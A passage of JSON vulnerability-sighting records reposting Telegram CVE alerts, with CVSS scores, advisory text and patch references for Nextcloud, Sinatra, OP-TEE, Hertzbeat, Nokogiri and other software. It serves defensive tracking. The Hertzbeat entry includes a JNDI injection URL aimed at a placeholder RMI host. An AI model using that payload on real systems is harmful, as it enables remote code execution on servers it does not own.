"GHSA-39PV-4VMJ-C4FR", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12880", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-41958\n\ud83d\udd25 CVSS Score: 7.3 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: super-xray is a web vulnerability scanning tool. Versions prior to 0.7 assumed trusted input for the program config which is stored in a yaml file. An attacker with local access to the file could exploit this and compromise the program. This issue has been addressed in commit `4d0d5966` and will be included in future releases. Users are advised to upgrade. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2022-11-25T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-22T15:59:43.385Z\n\ud83d\udd17 References:\n1. https://github.com/4ra1n/super-xray/security/advisories/GHSA-39pv-4vmj-c4fr\n2. https://github.com/4ra1n/super-xray/commit/4d0d59663596db03f39d7edd2be251d48b52dcfc", "creation_timestamp": "2025-04-22T16:03:21.000000Z"}, {"uuid": "8ab661a9-a286-44d0-a5f8-d1065e572633", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-82XX-98XV-4JXV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12878", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-39334\n\ud83d\udd25 CVSS Score: 3.9 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N)\n\ud83d\udd39 Description: Nextcloud also ships a CLI utility called nextcloudcmd which is sometimes used for automated scripting and headless servers. Versions of nextcloudcmd prior to 3.6.1 would incorrectly trust invalid TLS certificates, which may enable a Man-in-the-middle attack that exposes sensitive data or credentials to a network attacker. This affects the CLI only. It does not affect the standard GUI desktop Nextcloud clients, and it does not affect the Nextcloud server.\n\ud83d\udccf Published: 2022-11-25T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-22T15:59:53.227Z\n\ud83d\udd17 References:\n1. https://github.com/nextcloud/security-advisories/security/advisories/GHSA-82xx-98xv-4jxv\n2. https://github.com/nextcloud/desktop/issues/4927\n3. https://github.com/nextcloud/desktop/pull/5022\n4. https://hackerone.com/reports/1699740", "creation_timestamp": "2025-04-22T16:03:16.000000Z"}, {"uuid": "701bb30b-b14f-4e70-938a-f2d03e1cf57a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QV6C-367R-3W6Q", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12883", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-46147\n\ud83d\udd25 CVSS Score: 8.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: Drag and Drop XBlock v2 implements a drag-and-drop style problem, where a learner has to drag items to zones on a target image. Versions prior to 3.0.0 are vulnerable to cross-site scripting in multiple XBlock Fields. Any platform that has deployed the XBlock may be impacted. Version 3.0.0 contains a patch for this issue. There are no known workarounds.\n\ud83d\udccf Published: 2022-11-28T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-22T15:59:21.749Z\n\ud83d\udd17 References:\n1. https://github.com/openedx/xblock-drag-and-drop-v2/security/advisories/GHSA-qv6c-367r-3w6q\n2. https://github.com/openedx/xblock-drag-and-drop-v2/pull/295#issuecomment-1277693864\n3. https://github.com/openedx/xblock-drag-and-drop-v2/commit/68887d1b4a44325d2de7573d450e41129ba98b1a\n4. https://github.com/openedx/xblock-drag-and-drop-v2/releases/tag/v3.0.0", "creation_timestamp": "2025-04-22T16:03:24.000000Z"}, {"uuid": "0d23b266-68e8-41f3-8d57-cd8c818d38a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2X8X-JMRP-PHXW", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12881", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-45442\n\ud83d\udd25 CVSS Score: 8.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: Sinatra is a domain-specific language for creating web applications in Ruby. An issue was discovered in Sinatra 2.0 before 2.2.3 and 3.0 before 3.0.4. An application is vulnerable to a reflected file download (RFD) attack that sets the Content-Disposition header of a response when the filename is derived from user-supplied input. Version 2.2.3 and 3.0.4 contain patches for this issue.\n\ud83d\udccf Published: 2022-11-28T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-22T15:59:32.565Z\n\ud83d\udd17 References:\n1. https://github.com/sinatra/sinatra/security/advisories/GHSA-2x8x-jmrp-phxw\n2. https://github.com/sinatra/sinatra/commit/ea8fc9495a350f7551b39e3025bfcd06f49f363b\n3. https://github.com/advisories/GHSA-8x94-hmjh-97hq\n4. https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf\n5. https://lists.debian.org/debian-lts-announce/2023/01/msg00005.html", "creation_timestamp": "2025-04-22T16:03:22.000000Z"}, {"uuid": "b3bd1215-5641-43f6-9cbf-4286030124dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-65W8-6MRG-52G7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12885", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-46152\n\ud83d\udd25 CVSS Score: 8.2 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: OP-TEE Trusted OS is the secure side implementation of OP-TEE project, a Trusted Execution Environment. Versions prior to 3.19.0, contain an Improper Validation of Array Index vulnerability. The function `cleanup_shm_refs()` is called by both `entry_invoke_command()` and `entry_open_session()`. The commands `OPTEE_MSG_CMD_OPEN_SESSION` and `OPTEE_MSG_CMD_INVOKE_COMMAND` can be executed from the normal world via an OP-TEE SMC. This function is not validating the `num_params` argument, which is only limited to `OPTEE_MSG_MAX_NUM_PARAMS` (127) in the function `get_cmd_buffer()`. Therefore, an attacker in the normal world can craft an SMC call that will cause out-of-bounds reading in `cleanup_shm_refs` and potentially freeing of fake-objects in the function `mobj_put()`. A normal-world attacker with permission to execute SMC instructions may exploit this flaw. Maintainers believe this problem permits local privilege escalation from the normal world to the secure world. Version 3.19.0 contains a fix for this issue. There are no known workarounds.\n\ud83d\udccf Published: 2022-11-29T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-22T15:59:11.617Z\n\ud83d\udd17 References:\n1. https://github.com/OP-TEE/optee_os/security/advisories/GHSA-65w8-6mrg-52g7\n2. https://github.com/OP-TEE/optee_os/commit/728616b28df659cf0bdde6e58a471f6ef25d023c\n3. https://github.com/OP-TEE/optee_os/blob/c2d449482de098f1c894b94f338440e5a327813d/core/tee/entry_std.c#L257\n4. https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H/E:U/RL:X/RC:X/CR:M/IR:M/AR:M/MAV:L/MAC:L/MPR:H/MUI:N/MS:C/MC:H/MI:H/MA:H&amp;version=3.1", "creation_timestamp": "2025-04-22T16:03:29.000000Z"}, {"uuid": "08220b6e-435c-4af1-8e26-ad1c0642f7eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8C87-XPQV-C7MP", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12887", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-46162\n\ud83d\udd25 CVSS Score: 8.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: discourse-bbcode is the official BBCode plugin for Discourse. Prior to commit 91478f5, CSS injection can occur when rendering content generated with the discourse-bccode plugin. This vulnerability only affects sites which have the discourse-bbcode plugin installed and enabled. This issue is patched in commit 91478f5. As a workaround, ensure that the Content Security Policy is enabled and monitor any posts that contain bbcode.\n\ud83d\udccf Published: 2022-11-30T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-22T15:58:52.978Z\n\ud83d\udd17 References:\n1. https://github.com/discourse/discourse-bbcode/security/advisories/GHSA-8c87-xpqv-c7mp\n2. https://github.com/discourse/discourse-bbcode/commit/91478f5cfecdcc43cf85b997168a8ecfd0f8df90", "creation_timestamp": "2025-04-22T16:03:30.000000Z"}, {"uuid": "9f7e9339-c69d-4097-ada3-6d18db00a51c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H2PH-VHM7-G4HP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12891", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-23469\n\ud83d\udd25 CVSS Score: 3.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N)\n\ud83d\udd39 Description: Traefik is an open source HTTP reverse proxy and load balancer. Versions prior to 2.9.6 are subject to a potential vulnerability in Traefik displaying the Authorization header in its debug logs. In certain cases, if the log level is set to DEBUG, credentials provided using the Authorization header are displayed in the debug logs. Attackers must have access to a users logging system in order for credentials to be stolen. This issue has been addressed in version 2.9.6. Users are advised to upgrade. Users unable to upgrade may set the log level to `INFO`, `WARN`, or `ERROR`.\n\ud83d\udccf Published: 2022-12-08T21:33:19.114Z\n\ud83d\udccf Modified: 2025-04-22T15:58:19.635Z\n\ud83d\udd17 References:\n1. https://github.com/traefik/traefik/security/advisories/GHSA-h2ph-vhm7-g4hp\n2. https://github.com/traefik/traefik/pull/9574\n3. https://github.com/traefik/traefik/releases/tag/v2.9.6", "creation_timestamp": "2025-04-22T16:03:37.000000Z"}, {"uuid": "0d984afb-822d-4a52-a63f-e933a5405b98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-528Q-4PGM-WVG2", "type": "seen", "source": "Telegram/Ixvst1zhHfk7lK_UhI5B29IE_UYLZOT2b0wkW9xa8GvuAtM", "content": "", "creation_timestamp": "2026-01-02T18:54:45.000000Z"}, {"uuid": "80dbe222-89ef-4446-8712-9b6aa4489e42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CP68-QRHR-G9H8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12897", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-26135\n\ud83d\udd25 CVSS Score: 8.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: MeshCentral is a full computer management web site. Versions prior to 1.1.21 a cross-site websocket hijacking (CSWSH) vulnerability within the control.ashx endpoint. This component is the primary mechanism used within MeshCentral to perform administrative actions on the server. The vulnerability is exploitable when an attacker is able to convince a victim end-user to click on a malicious link to a page hosting an attacker-controlled site. The attacker can then originate a cross-site websocket connection using client-side JavaScript code to connect to `control.ashx` as the victim user within MeshCentral. Version 1.1.21 contains a patch for this issue.\n\ud83d\udccf Published: 2024-02-20T19:50:30.723Z\n\ud83d\udccf Modified: 2025-04-22T16:26:34.189Z\n\ud83d\udd17 References:\n1. https://github.com/Ylianst/MeshCentral/security/advisories/GHSA-cp68-qrhr-g9h8\n2. https://github.com/Ylianst/MeshCentral/commit/f2e43cc6da9f5447dbff0948e6c6024c8a315af3", "creation_timestamp": "2025-04-22T17:03:16.000000Z"}, {"uuid": "1ac008b6-cadf-44d8-ae0e-877459c19f2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P9RC-RMR5-529J", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12929", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-29199\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.LoadAndRemapMatrix does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack. The code assumes `initializing_values` is a vector but there is no validation for this before accessing its value. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.\n\ud83d\udccf Published: 2022-05-20T21:40:12.000Z\n\ud83d\udccf Modified: 2025-04-22T17:59:37.834Z\n\ud83d\udd17 References:\n1. https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4\n2. https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2\n3. https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1\n4. https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0\n5. https://github.com/tensorflow/tensorflow/security/advisories/GHSA-p9rc-rmr5-529j\n6. https://github.com/tensorflow/tensorflow/commit/3150642acbbe254e3c3c5d2232143fa591855ac9\n7. https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/load_and_remap_matrix_op.cc#L70-L98", "creation_timestamp": "2025-04-22T18:03:45.000000Z"}, {"uuid": "15820562-ce49-415f-b826-e6349b1266f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5834-XV5Q-CGFW", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13104", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-31148\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: Shopware is an open source e-commerce software. In versions from 5.7.0 a persistent cross site scripting (XSS) vulnerability exists in the customer module. Users are recommend to update to the current version 5.7.14. You can get the update to 5.7.14 regularly via the Auto-Updater or directly via the download overview. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2022-08-01T17:10:12.000Z\n\ud83d\udccf Modified: 2025-04-23T17:56:53.899Z\n\ud83d\udd17 References:\n1. https://github.com/shopware/shopware/security/advisories/GHSA-5834-xv5q-cgfw\n2. https://github.com/shopware/shopware/commit/7875855005648fba7b39371a70816afae2e07daf\n3. https://docs.shopware.com/en/shopware-5-en/security-updates/security-update-07-2022", "creation_timestamp": "2025-04-23T18:05:43.000000Z"}, {"uuid": "f5271a48-6f2e-4595-8128-929088a8fdc3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FC77-H3JC-6MFV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13119", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-23656\n\ud83d\udd25 CVSS Score: 4.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N)\n\ud83d\udd39 Description: Zulip is an open source team chat app. The `main` development branch of Zulip Server from June 2021 and later is vulnerable to a cross-site scripting vulnerability on the recent topics page. An attacker could maliciously craft a full name for their account and send messages to a topic with several participants; a victim who then opens an overflow tooltip including this full name on the recent topics page could trigger execution of JavaScript code controlled by the attacker. Users running a Zulip server from the main branch should upgrade from main (2022-03-01 or later) again to deploy this fix.\n\ud83d\udccf Published: 2022-03-02T20:25:10.000Z\n\ud83d\udccf Modified: 2025-04-23T18:59:20.616Z\n\ud83d\udd17 References:\n1. https://github.com/zulip/zulip/security/advisories/GHSA-fc77-h3jc-6mfv\n2. https://github.com/zulip/zulip/commit/e090027adcbf62737d5b1f83a9618a9500a49321", "creation_timestamp": "2025-04-23T19:05:14.000000Z"}, {"uuid": "7eea467a-5885-4a41-982b-c007a7e4b3b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MQHG-V22X-PQJ8", "type": "seen", "source": "Telegram/hVIsWvvgLiiM_GtF82joYNFY3TrnJxWWlKsVG9afGpT3z9w", "content": "", "creation_timestamp": "2026-01-03T14:32:26.000000Z"}, {"uuid": "762e1e15-8b9f-4ef8-bd7a-498f288747c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-24FR-44F8-FQWG", "type": "published-proof-of-concept", "source": "Telegram/_P20Htht508gPcGtfhYsw3BkHMYZAVXCzBRlMvbh3o3mGtY", "content": "", "creation_timestamp": "2026-04-14T20:03:14.000000Z"}, {"uuid": "3d20f3d1-b0b1-414e-9ff8-d7fb522583cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XRVH-RVC4-5M43", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12908", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-26483\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: An arbitrary file upload vulnerability in the Profile Image module of Kirby CMS v4.1.0 allows attackers to execute arbitrary code via a crafted PDF file.\n\ud83d\udccf Published: 2024-02-22T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-22T16:22:51.229Z\n\ud83d\udd17 References:\n1. https://shrouded-trowel-50c.notion.site/Kirby-CMS-4-1-0-Unrestricted-File-Upload-dc60ce3132f04442b73f2dba2631fae0?pvs=4\n2. https://github.com/getkirby/kirby/security/advisories/GHSA-xrvh-rvc4-5m43", "creation_timestamp": "2025-04-22T17:03:33.000000Z"}, {"uuid": "180d1f85-16d6-46b5-b022-12cffc303d4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-32CJ-RM2Q-22CC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12907", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-23654\n\ud83d\udd25 CVSS Score: 4.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N)\n\ud83d\udd39 Description: discourse-ai is the AI plugin for the open-source discussion platform Discourse. Prior to commit 94ba0dadc2cf38e8f81c3936974c167219878edd, interactions with different AI services are vulnerable to admin-initiated SSRF attacks. Versions of the plugin that include commit 94ba0dadc2cf38e8f81c3936974c167219878edd contain a patch. As a workaround, one may disable the discourse-ai plugin.\n\n\ud83d\udccf Published: 2024-02-21T20:28:12.939Z\n\ud83d\udccf Modified: 2025-04-22T16:23:20.217Z\n\ud83d\udd17 References:\n1. https://github.com/discourse/discourse-ai/security/advisories/GHSA-32cj-rm2q-22cc\n2. https://github.com/discourse/discourse-ai/commit/94ba0dadc2cf38e8f81c3936974c167219878edd", "creation_timestamp": "2025-04-22T17:03:32.000000Z"}, {"uuid": "4c33e282-96e4-4d19-b4c4-dff19064ea77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GCMP-VF6V-59GG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12913", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-51653\n\ud83d\udd25 CVSS Score: 9.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: Hertzbeat is a real-time monitoring system. In the implementation of `JmxCollectImpl.java`, `JMXConnectorFactory.connect` is vulnerable to JNDI injection. The corresponding interface is `/api/monitor/detect`. If there is a URL field, the address will be used by default. When the URL is `service:jmx:rmi:///jndi/rmi://xxxxxxx:1099/localHikari`, it can be exploited to cause remote code execution. Version 1.4.1 contains a fix for this issue.\n\ud83d\udccf Published: 2024-02-22T15:39:49.280Z\n\ud83d\udccf Modified: 2025-04-22T16:19:23.604Z\n\ud83d\udd17 References:\n1. https://github.com/dromara/hertzbeat/security/advisories/GHSA-gcmp-vf6v-59gg\n2. https://github.com/dromara/hertzbeat/commit/f794b0d82be49c596c04a042976446559eb315ef", "creation_timestamp": "2025-04-22T17:03:37.000000Z"}, {"uuid": "7ce582bf-5bdd-4c3c-801b-b0268fab1ae8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-66C2-P8RH-QX87", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12912", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-44379\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: baserCMS is a website development framework. Prior to version 5.0.9, there is a cross-site scripting vulnerability in the site search feature. Version 5.0.9 contains a fix for this vulnerability.\n\ud83d\udccf Published: 2024-02-22T14:47:14.333Z\n\ud83d\udccf Modified: 2025-04-22T16:19:39.790Z\n\ud83d\udd17 References:\n1. https://github.com/baserproject/basercms/security/advisories/GHSA-66c2-p8rh-qx87\n2. https://github.com/baserproject/basercms/commit/18549396e5a9b8294306a54a876af164b0b57da4\n3. https://basercms.net/security/JVN_73283159", "creation_timestamp": "2025-04-22T17:03:36.000000Z"}, {"uuid": "8b22b5d9-cd6f-44ab-a853-efad7cc113be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CVX5-M8VG-VXGC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12915", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-24897\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: APIs to evaluate content with Velocity is a package for APIs to evaluate content with Velocity. Starting with version 2.3 and prior to 12.6.7, 12.10.3, and 13.0, the velocity scripts are not properly sandboxed against using the Java File API to perform read or write operations on the filesystem. Writing an attacking script in Velocity requires the Script rights in XWiki so not all users can use it, and it also requires finding an XWiki API which returns a File. The problem has been patched in versions 12.6.7, 12.10.3, and 13.0. There is no easy workaround for fixing this vulnerability other than upgrading and being careful when giving Script rights.\n\ud83d\udccf Published: 2022-05-02T21:49:17.000Z\n\ud83d\udccf Modified: 2025-04-22T18:02:07.004Z\n\ud83d\udd17 References:\n1. https://github.com/xwiki/xwiki-commons/security/advisories/GHSA-cvx5-m8vg-vxgc\n2. https://github.com/xwiki/xwiki-commons/pull/127\n3. https://github.com/xwiki/xwiki-commons/commit/215951cfb0f808d0bf5b1097c9e7d1e503449ab8\n4. https://jira.xwiki.org/browse/XWIKI-5168", "creation_timestamp": "2025-04-22T18:03:27.000000Z"}, {"uuid": "d35694ff-7457-4479-ad76-40aeb9763d11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2JMX-8MH8-PM8W", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12917", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-29218\n\ud83d\udd25 CVSS Score: 7.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N)\n\ud83d\udd39 Description: RubyGems is a package registry used to supply software for the Ruby language ecosystem. An ordering mistake in the code that accepts gem uploads allowed some gems (with platforms ending in numbers, like `arm64-darwin-21`) to be temporarily replaced in the CDN cache by a malicious package. The bug has been patched, and is believed to have never been exploited, based on an extensive review of logs and existing gems by rubygems. The easiest way to ensure that an application has not been exploited by this vulnerability is to verify all downloaded .gems checksums match the checksum recorded in the RubyGems.org database. RubyGems.org has been patched and is no longer vulnerable to this issue.\n\ud83d\udccf Published: 2022-05-12T23:55:08.000Z\n\ud83d\udccf Modified: 2025-04-22T18:01:45.416Z\n\ud83d\udd17 References:\n1. https://github.com/rubygems/rubygems.org/security/advisories/GHSA-2jmx-8mh8-pm8w\n2. https://security.netapp.com/advisory/ntap-20220629-0010/", "creation_timestamp": "2025-04-22T18:03:29.000000Z"}, {"uuid": "b064a13e-6f3d-43ec-9225-4bbacde00845", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XH29-R2W5-WX8M", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12920", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-29181\n\ud83d\udd25 CVSS Score: 8.2 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H)\n\ud83d\udd39 Description: Nokogiri is an open source XML and HTML library for Ruby. Nokogiri prior to version 1.13.6 does not type-check all inputs into the XML and HTML4 SAX parsers, allowing specially crafted untrusted inputs to cause illegal memory access errors (segfault) or reads from unrelated memory. Version 1.13.6 contains a patch for this issue. As a workaround, ensure the untrusted input is a `String` by calling `#to_s` or equivalent.\n\ud83d\udccf Published: 2022-05-20T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-22T18:01:15.465Z\n\ud83d\udd17 References:\n1. https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-xh29-r2w5-wx8m\n2. https://github.com/sparklemotion/nokogiri/commit/db05ba9a1bd4b90aa6c76742cf6102a7c7297267\n3. https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.6\n4. https://securitylab.github.com/advisories/GHSL-2022-031_GHSL-2022-032_Nokogiri/\n5. https://security.gentoo.org/glsa/202208-29\n6. https://support.apple.com/kb/HT213532\n7. http://seclists.org/fulldisclosure/2022/Dec/23", "creation_timestamp": "2025-04-22T18:03:34.000000Z"}, {"uuid": "dcd4bb8c-8a38-458c-9cb6-ac778819440f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VXPR-HCQQ-7FW7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12919", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-24890\n\ud83d\udd25 CVSS Score: 2.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: Nextcloud Talk is a video and audio conferencing app for Nextcloud. In versions prior to 13.0.5 and 14.0.0, a call moderator can indirectly enable user webcams by granting permissions, if they were enabled before removing the permissions. A patch is available in versions 13.0.5 and 14.0.0. There are currently no known workarounds.\n\ud83d\udccf Published: 2022-05-17T19:00:15.000Z\n\ud83d\udccf Modified: 2025-04-22T18:01:26.535Z\n\ud83d\udd17 References:\n1. https://github.com/nextcloud/security-advisories/security/advisories/GHSA-vxpr-hcqq-7fw7\n2. https://github.com/nextcloud/spreed/issues/7048\n3. https://github.com/nextcloud/spreed/pull/7034\n4. https://github.com/nextcloud/spreed/pull/7092", "creation_timestamp": "2025-04-22T18:03:30.000000Z"}, {"uuid": "12004c28-61a4-4fcf-9d70-cf4bc88f5fdd", "vulnerability_lookup_origin": 